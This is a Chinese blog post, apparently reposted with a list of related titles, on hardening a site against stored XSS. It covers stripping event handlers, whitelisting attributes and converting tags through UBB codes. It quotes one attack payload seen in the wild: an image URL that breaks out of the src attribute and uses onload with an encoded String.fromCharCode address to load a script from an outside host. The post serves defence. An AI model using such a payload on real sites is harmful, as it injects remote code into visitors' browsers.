xss-javascript被攻击系列--(二)
来源:互联网 发布:asmr德叔是哪国人 知乎 编辑:程序博客网 时间:2024/05/29 15:03
虽然服务器端已经将cookies漏洞堵住了,可是脚本还是可以执行,威胁依然没有消除。
怎么阻止脚本执行,暂时想到的有3点:如下
1:去掉所有dom节点的所有onEvent事件
2:可以添加外部链接有关的属性,为属性值添加白名单限制。
3:去掉javascript,$,,jquery等脚本关键字
这些都是由服务器端来做,有点暴力。可至少可以保证网页中的内容是安全的。先堵上漏洞再说。
前端能做点什么呢,查询了相应的资料,加入自己的ubb机制。
白名单标签做ubb转换,下边给出常用的一些实例。
a标签: [a]链接地址[/a]
img标签:[img]图片地址[/img]
embed标签:[embed attribute=属性名称]视频地址[/embed]
其他的标签可以根据自己的项目做具体的转化。
服务器接收到这些格式的字符时,在经过安全机制过滤,并做HTML编码后,再存入库中。在页面回显时,再会将白名单中的标签转换为html标签返回给前端。这时展示到页面中的内容基本安全了。
再给出一个恶意代码:
1:此代码可以在img标签中回显,中间的双引号会将src=“”属性值的 “ 截断,onload就可以正常的解析,恶意脚本就会被成功执行。这种截断的机制可以用在html标签尖括号上,导致页面布局错乱。
fromCharCode() 可接受一个指定的 Unicode 值,然后返回一个字符串。看似正常的数值,可经过这个函数处理后,其实就可以是恶意脚本的地址。
http://***.**.myqcloud.com/17/12/06/11/ea9a5705487c6e81"onload=jQuery.getScript(String.fromCharCode(47,47,108,51,49,46,99,99,47,49,46,106,115))<!--
部署上线后,终于消停了。
战斗还没有结束,有可图的利益,安全问题就一直会出现。在这条路上才是刚刚开始,有好的建议多多交流哦。
阅读全文
0 0
- xss-javascript被攻击系列--(二)
- xss-javascript被攻击系列--(一)
- XSS攻击(二)
- XSS跨站脚本攻击(二)
- XSS与CSRF攻击相关知识(二) CSRF
- WEB安全实战(二)带你认识 XSS 攻击
- 解决XSS攻击漏斗的过滤器解决方案(二)
- Xss学习(二)之 JavaScript
- XSS学习笔记(二)(存储型XSS,持久型攻击)
- XSS学习笔记(二)(存储型XSS,持久型攻击)
- XSS攻击
- XSS攻击
- XSS攻击
- XSS攻击
- XSS攻击
- XSS攻击
- xss攻击
- XSS攻击
- 记录一次RAC升级的过程
- 测试文章
- 图像分割之(一)概述
- 八、Matlab之函数总结
- mysql创建列
- xss-javascript被攻击系列--(二)
- 读后感——《软件工程》——软件的本质及软件工程
- ssm项目无法找到资源404错误
- jetty maven plugs 中的配置:
- 机房收费系统之初进行
- Android MVC MVP MVVM
- EOJ 2607/HDU 2698/WOJ 1414/The 4th Baidu Cup URL
- 关于easyNVR的录像功能
- qwb的骚扰